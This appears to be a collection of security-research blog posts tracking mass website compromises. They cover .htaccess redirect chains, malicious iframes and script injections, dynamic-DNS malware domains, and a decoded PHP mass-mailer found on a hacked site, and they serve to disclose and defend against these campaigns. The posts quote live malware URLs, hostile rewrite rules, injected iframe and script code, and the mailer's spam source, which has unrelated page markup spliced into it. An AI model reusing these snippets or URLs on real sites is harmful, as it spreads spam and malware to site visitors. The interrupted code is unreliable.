Author: Daniel Cid

We posted yesterday about the Blackmuscats .htaccess redirection that was affecting thousands of web sites.

They are still happening (and growing), but the attackers decided to switch names to nonalco, mimosa and otherrandom keywords for their files:

1251    redirections    http://fitnes-corp.ru/shurimuri?5
1093    redirections    http://infofitnes.ru/interactive?5
818 redirections    http://fitnes-company.ru/interactive?5
817 redirections    http://mir-fitnes.ru/interactive?5
802 redirections    http://info-fitnes.ru/interactive?5
788 redirections    http://fitnescompany.ru/interactive?5
268 redirections    http://fitnes-corp.ru/shurimuri?5
220 redirections    http://infofitnes.ru/interactive?5
188 redirections    http://cofitnes.ru/mimosa?5
177 redirections    http://mir-fitnes.ru/interactive?5
168 redirections    http://fitnes-company.ru/interactive?5
165 redirections    http://info-fitnes.ru/interactive?5
162 redirections    http://fitnescompany.ru/interactive?5
79  redirections    http://fitnescorp.ru/shurimuri?5
40  redirections    http://nashfitnes.ru/nonalco?5
37  redirections    http://cofitnes.ru/mimosa?5
1191    redirections    http://nashfitnes.ru/nonalco?5
981 redirections    http://nash-fitnes.ru/nonalco?5
953 redirections    http://supasweb.ru/blackmuscats?5
920 redirections    http://nashifitnes.ru/nonalco?5
895 redirections    http://nashafitnes.ru/nonalco?5
878 redirections    http://nasha-fitnes.ru/nonalco?5
555 redirections    http://fitnes-ltd.ru/shurimuri?5
261 redirections    http://nashfitnes.ru/nonalco?5
208 redirections    http://supasweb.ru/blackmuscats?5
199 redirections    http://nash-fitnes.ru/nonalco?5
190 redirections    http://nashafitnes.ru/nonalco?5
189 redirections    http://nashifitnes.ru/nonalco?5
180 redirections    http://nasha-fitnes.ru/nonalco?5
116 redirections    http://fitnes-ltd.ru/shurimuri?5

The redirection is still the same, going from those .ru domains, to additional second level .ru domains and themto a .pl:

http://russian-fitnes.ru/prunus/cerasus.php
http://www1.vulnerabilitytoolssolver.pl/18o8e9/al/1fedfba29dd0193d/pr2/0/
http://www1.antivirusworrydanger.pl/370l3591/al/1fedfba29dd0193d/pr2/0/
http://minimizerprocessesdebugger.pl/b6l1s/al/78dee9e271084cb2/pr2/238/
http://www1.stabilityprotectionscanner.pl/n9044s5/al/1fedfba29dd0193d/pr2/0/

So far we have identified more than 17,000 sites with this type of malware. More details as we track them.

While looking at a compromised site, we found an interesting mass mailer in there. The content was encoded using eval/gzinflate and base64_decode:

But when switching the “eval” for “print” we could see the mass mailer hidden and what it was doing:

$secure = “racrewmania@googlemail.com”; @$action=$_POST[‘action’]; @$from=$_POST[‘from’]; @$realname=$_POST[‘realname’]; @$replyto=$_POST[‘replyto’]; @$subject=$_POST[‘subject’]; @$message=$_POST[‘message’]; @$emaillist=$_POST[’emaillist’]; @$file_name=$_FILES[‘file’][‘name’]; @$contenttype=$_POST[‘contenttype’]; @$file=$_FILES[‘file’][‘tmp_name’]; @$amount=$_POST[‘amount’]; set_time_limit(intval($_POST[‘timelimit’])); ..<title>UnixStats Mass MaiLer</title>..for($xx=0; $xx<$amount; $xx++){ for($x=0; $x<$numemails; $x++){ $to = $allemails[$x]; if ($to){ $to = ereg_replace(” “, “”, $to); $message = ereg_replace(“&email&”, $to, $message); $subject = ereg_replace(“&email&”, $to, $subject); print “Sending mail to $to…….”; flush(); $header = “From: $realname <$from>rnReply-To: $replytorn”; $header .= “MIME-Version: 1.0rn”; If ($file_name) $header .= “Content-Type: multipart/mixed; boundary=$uidrn”; If ($file_name) $header .= “–$uidrn”; $header .= “Content-Type: text/$contenttypern”; $header .= “Content-Transfer-Encoding: 8bitrnrn”; $header .= “$messagern”; If ($file_name) $header .= “–$uidrn”; If ($file_name) $header .= “Content-Type: $file_type; name=”$file_name””rn””; If ($file_name) $header .= “”Content-Transfer-Encoding: base64rn””; If ($file_name) $header .= “”Content-Disposition: attachment; filename=””$file_name””rnrn””; If ($file_name) $header .= “”$contentrn””; If ($file_name) $header .= “”–$uid–“”; mail($to</p></div></article></main></div></div><div><nav class=”navigation post-navigation” role=”navigation” aria-label=”Posts”><h2 class=”screen-reader-text”>Post navigation</h2><div class=”nav-links”><div class=”nav-previous”><a href=”https://labs.sucuri.net/flagging-google-com-as-malware/” rel=”prev”>Flagging google.com as malware</a></div><div class=”nav-next”><a href=”https://labs.sucuri.net/strange-htaccess-redirections-to-google-com/” rel=”next”>Strange .htaccess redirections to google.com</a></div></div></nav></div><footer id=”colophon” class=”site-footer”><div class=”site-info”> <a href=”https://wordpress.org/”> Proudly powered by WordPress </a> <span class=”sep”> | </span> Theme: sucurikb by <a href=”http://underscores.me/”>Underscores.me</a>.</div></footer></div><footer id=”sucuri-docs-footer”><div class=”sucuri-docs-footer-container”><div class=”grid-container”><div class=”grid-x grid-margin-x”><div class=”cell large-2″><p class=”sucuri-docs-footer-menu-heading”>PRODUCTS</p><div class=”menu-products-container”><ul id=”menu-products” class=”menu”><li id=”menu-item-595″ class=”menu-item menu-item-type-custom menu-item-object-custom menu-item-595″><a href=”https://sucuri.net/website-firewall/”>Website Firewall</a></li><li id=”menu-item-596″ class=”menu-item menu-item-type-custom menu-item-object-custom menu-item-596″><a href=”https://sucuri.net/website-security-platform/”>Website Antivirus</a></li><li id=”menu-item-597″ class=”menu-item menu-item-type-custom menu-item-object-custom menu-item-597″><a href=”https://sucuri.net/website-backups/”>Website Backups</a></li><li id=”menu-item-598″ class=”menu-item menu-item-type-custom menu-item-object-custom menu-item-598″><a href=”https://sucuri.net/wordpress-security/”>WordPress Security</a></li><li id=”menu-item-599″ class=”menu-item menu-item-type-custom menu-item-object-custom menu-item-599″><a href=”https://sucuri.net/custom/enterprise/”>Enterprise Services</a></li></ul></div></div><div class=”cell large-2″><p class=”sucuri-docs-footer-menu-heading”>SOLUTIONS</p><div class=”menu-solutions-container”><ul id=”menu-solutions” class=”menu”><li id=”menu-item-606″ class=”menu-item menu-item-type-custom menu-item-object-custom menu-item-606″><a href=”https://sucuri.net/website-firewall/ddos-protection”>DDoS Protection</a></li><li id=”menu-item-607″ class=”menu-item menu-item-type-custom menu-item-object-custom menu-item-607″><a href=”https://sucuri.net/website-security-platform/malware-scanning-and-detection”>Malware Detection</a></li><li id=”menu-item-608″ class=”menu-item menu-item-type-custom menu-item-object-custom menu-item-608″><a href=”https://sucuri.net/website-security-platform/malware-removal”>Malware Removal</a></li><li id=”menu-item-609″ class=”menu-item menu-item-type-custom menu-item-object-custom menu-item-609″><a href=”https://sucuri.net/website-firewall/stop-website-attacks-and-hacks”>Malware Prevention</a></li><li id=”menu-item-610″ class=”menu-item menu-item-type-custom menu-item-object-custom menu-item-610″><a href=”https://sucuri.net/website-security-platform/blacklist-removal-and-repair”>Blacklist Removal</a></li></ul></div></div><div class=”cell large-2″><p class=”sucuri-docs-footer-menu-heading”>SUPPORT</p><div class=”menu-support-container”><ul id=”menu-support” class=”menu”><li id=”menu-item-600″ class=”menu-item menu-item-type-custom menu-item-object-custom menu-item-600″><a href=”https://blog.sucuri.net/”>Blog</a></li><li id=”menu-item-601″ class=”menu-item menu-item-type-custom menu-item-object-custom menu-item-601″><a href=”https://kb.sucuri.net/”>Knowledge Base</a></li><li id=”menu-item-602″ class=”menu-item menu-item-type-custom menu-item-object-custom menu-item-602″><a href=”https://sitecheck.sucuri.net/”>SiteCheck</a></li><li id=”menu-item-603″ class=”menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-603″><a href=”https://labs.sucuri.net/”>Research Labs</a></li><li id=”menu-item-604″ class=”menu-item menu-item-type-custom menu-item-object-custom menu-item-604″><a href=”https://sucuri.net/faq”>FAQ</a></li><li id=”menu-item-605″ class=”menu-item menu-item-type-custom menu-item-object-custom menu-item-605″><a href=”https://abuse.sucuri.net/”>Report Abuse</a></li></ul></div></div><div class=”cell large-2″><p class=”sucuri-docs-footer-menu-heading”>COMPANY</p><div class=”menu-company-container”><ul id=”menu-company” class=”menu”><li id=”menu-item-611″ class=”menu-item menu-item-type-custom menu-item-object-custom menu-item-611″><a href=”https://sucuri.net/company”>About</a></li><li id=”menu-item-612″ class=”menu-item menu-item-type-custom menu-item-object-custom menu-item-612″><a href=”https://sucuri.net/company/media”>Media</a></li><li id=”menu-item-613″ class=”menu-item menu-item-type-custom menu-item-object-custom menu-item-613″><a href=”https://sucuri.net/company/events”>Events</a></li><li id=”menu-item-614″ class=”menu-item menu-item-type-custom menu-item-object-custom menu-item-614″><a href=”https://sucuri.net/company/employment”>Employment</a></li><li id=”menu-item-615″ class=”menu-item menu-item-type-custom menu-item-object-custom menu-item-615″><a href=”https://sucuri.net/company/contact-us”>Contact</a></li><li id=”menu-item-616″ class=”menu-item menu-item-type-custom menu-item-object-custom menu-item-616″><a href=”https://sucuri.net/customers/”>Testimonials</a></li></ul></div></div><div class=”cell large-4 text-center”><div class=”footer-social-icons”><ul class=”list-inline”><li class=”list-inline-item”><a class=”p-ft-social-fb” href=”https://www.facebook.com/SucuriSecurity” target=”_blank” rel=”noopener noreferrer”><i class=”social-icon facebook”></i></a></li><li class=”list-inline-item”><a class=”p-ft-social-tw” href=”https://twitter.com/sucurisecurity” target=”_blank” rel=”noopener noreferrer”><i class=”social-icon twitter”></i></a></li><li class=”list-inline-item”><a class=”p-ft-social-ld” href=”https://www.linkedin.com/company/899487″ target=”_blank” rel=”noopener noreferrer”><i class=”social-icon linkedin”></i></a></li><li class=”list-inline-item”><a class=”p-ft-social-ig” href=”https://www.instagram.com/sucurisecurity/” target=”_blank” rel=”noopener noreferrer”><i class=”social-icon instagram”></i></a></li></ul></div><div><p><a href=”https://dashboard.sucuri.net/login/” class=”btn login mp-ft-login auto-track” data-gatrack=”Button_Click, Footer_Login”>Customer Login</a></p></div><div class=”footer-logo-wrapper”> <a href=”/” class=”footer-logo”></a></div></div></div></div><div class=”grid-container sucuri-docs-footer-b”><hr><div class=”grid-x grid-margin-x”><div class=”cell medium-8 large-8″><ul class=”list-inline unstyled-list”><li class=”list-inline-item”><a class=”mp-ft-copyright-terms auto-track” data-gatrack=”Button_Click, Footer_Terms_Of_Use” href=”/terms-of-service”>Terms of Use</a></li><li class=”list-inline-item”><a class=”mp-ft-copyright-priv auto-track” data-gatrack=”Button_Click, Footer_Privacy_Policy” href=”/privacy-policy”>Privacy Policy</a></li><li class=”list-inline-item”><a class=”mp-ft-copyright-faq auto-track” data-gatrack=”Button_Click, Footer_FAQ” href=”/faq”>Frequently Asked Questions</a></li></ul></div><div class=”cell medium-4 large-4 copyright text-center”><p>© 2020 Sucuri Inc. All rights reserved.</p></div></div></div></div></footer> <script src=”https://labs.sucuri.net/wp-content/cache/min/1/7a7f2154ed98976f1f4d0d6faaeb245e.js” data-minify=”1″></script></body></html></p>

We are seeing thousands of sites compromised with an iframe from cndexit.com:

This is the iframe that we detected:

http://cdn.cdnexit.com/Home/detect/index.php

Google has already flagged this domain and found it to be responsible for the infection of more than 1.5k sites:

Has this site acted as an intermediary resulting in further distribution of malware?
Over the past 90 days, cdnexit.com appeared to function as an intermediary for the infection of 1509 site(s) including txt.ir/, remedios-naturais.com/, pornupload.com/.

We can’t say for sure how sites got hacked, but we will post more details when we have them.

This is a simple way to know when a vulnerability in Plesk (or any other software) is being exploited in the wild:

When the mass scans for it starts. The data is from ISC (isc.sans.org) and shows a massive increase in thenumber of queries for port 8443 (used by Plesk).

Top malware entry for the day: poseyhumane.org/stats.php

<iframe src="http://poseyhumane.org/stats.php" name="Twitter"..
 scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>

It seems to be the stats.php malware of the day. Related to our post here: Distributed Malware Network Outbreak Using Stats.php.

We also identified a CC (command and control server) for these infections: http://botstatisticupdate.com/stat/stat.php. More info to come soon.

A few weeks ago we reported the case of a few compromised sites with an .htaccess redirection to msn.com. Now we areseeing a few sites with the same redirection but to google.com.

This is what we are seeing on some hacked sites (.htaccess file):

RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|youtube|wikipedia|excite|altavista|msn|aol|goto|infoseek|lycos|search|bing|dogpile|facebook|twitter|live|myspace|linkedin|flickr)\.(.*)
RewriteRule ^(.*)$ http://google.com [R=301,L]

.. lots of empty lines/ white spaces ...
ErrorDocument 404 http://google.com

We have no idea why this hapening. Maybe a bug in the attackers malware injection code, but we can\’t say for sure. We will post more details when we find out what is going on.

If you look at the top domains distributing malware for the last days (and months), what do you see in common?

#numberofsitesinfected #type #malwaredomain
650 iframe  http://cvrtyi.ddns.info/nighttrend.cgi?8
315 iframe  http://byiegfs.ddns.info/nighttrend.cgi?8
275 iframe  http://ileshdg.qhigh.com/nighttrend.cgi?8
179 iframe  http://sdcmd.freewww.info/nighttrend.cgi?8
159 iframe  http://lmybv.ddns.name/nighttrend.cgi?8
148 iframe  http://wstckewb.freewww.biz/nighttrend.cgi?8
146 iframe  http://zqajsv.qhigh.com/nighttrend.cgi?8
126 iframe  http://avvof.sellClassics.com/nighttrend.cgi?8
116 iframe  http://wnevt.pcanywhere.net/nighttrend.cgi?8
101 iframe  http://acijwfr.freewww.info/nighttrend.cgi?8
93  iframe  http://cqcsk.ddns.name/facebook.cgi?8
84  iframe  http://thcolxbbt.qhigh.com/facebook.cgi?8
77  iframe  http://bwnzgtv.qhigh.com/facebook.cgi?8
74  iframe  http://anmvmhz.ddns.info/facebook.cgi?8
73  iframe  http://hbuwmx.myddns.com/facebook.cgi?8
72  iframe  http://qizkfd.mynumber.org/facebook.cgi?8

Most of them are using a ChangeIP.com (dynamic DNS) sub domain as the first level of injection. Just check ddns.info, qhigh.com,mynumber.org, pcanywhere.net, etc, etc. They are all part of: http://www.changeip.com/. Just in the last 60 days, weidentified more than 15,000 different sub domains from them being used to distribute malware.

Don\’t get us wrong, Dynamic DNS is a very useful service, but we would love if they would implement more serious filtering/blacklistingand some type of captcha to prevent their service from being abused by criminals.

However, in the current state, we can only recommend against using their service to avoid being thrown in the mix with thethousands of malicious domains that they host.

*If you look past 6 months ago, .co.cc was the main domain distributing malware, but since it was shut down, the attackers have migrated to changeip.com. Hopefully they will do something about it.

We are seeing a large amount of sites with a malscript from gccanada.com injected into them. The malware redirects visitors to searchmagnified.com, which redirects them to freeresultsguide.com. That’s the code being added to the hacked sites:

script type=’text/javascript’ src=”http://gccanada[.]com/jquery[.]js

What is so bad about it? The final domain \’freeresultsguide.com\’, pushes you to buy a fake anti virus software with some annoying messages and warnings:

Important security message. Please call the number provided asap to get your computer fixed. You have a virus!

If you see this gcanada code on your site, it means you got hacked. It is not from the Government of Canada, as they want you to think.